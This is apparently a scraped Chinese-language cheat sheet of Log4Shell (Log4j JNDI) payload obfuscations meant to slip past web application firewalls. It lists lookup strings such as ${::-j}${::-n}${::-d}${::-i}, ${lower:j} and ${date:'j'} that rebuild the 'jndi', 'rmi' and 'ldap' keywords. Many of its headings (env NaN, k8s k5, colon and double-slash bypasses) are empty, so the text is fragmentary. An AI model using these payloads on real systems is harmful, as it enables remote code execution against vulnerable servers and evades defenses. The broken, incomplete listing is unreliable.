初始payload
绕过方式
先罗列一下绕waf且不会影响初始payload的操作
切片
lower
date
env NaN
env HL
env BARFOO
upper
k8s k5
sd k5
nagli
jndi字符串绕过
可以使用下方的绕过payload去替代初始payload中的jndi字符串
切片
1
| ${::-j}${::-n}${::-d}${::-i}
|
1
| ${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}
|
lower
1
| ${lower:j}${lower:n}${lower:d}i
|
lower 和upper
1
| ${lower:j}${upper:n}${lower:d}${upper:i}
|
date
1
| ${date:'j'}${date:'n'}${date:'d'}${date:'i'}
|
env NaN
env HL
env BARFOO
k8s k5
ldap字符串绕过
可以使用下方的绕过payload去替代初始payload中的ldap字符串
切片
1
| ${::-l}${::-d}${::-a}${::-p}
|
env NaN
rmi字符串绕过
可以使用下方的绕过payload去替代初始payload中的rmi字符串
切片
lower
env NaN
冒号绕过
可以使用下方的绕过payload去替代初始payload中的冒号
env NaN
env BARFOO
sd k5
nagli
双斜杠绕过
可以使用下方的绕过payload去替代初始payload中的//
切片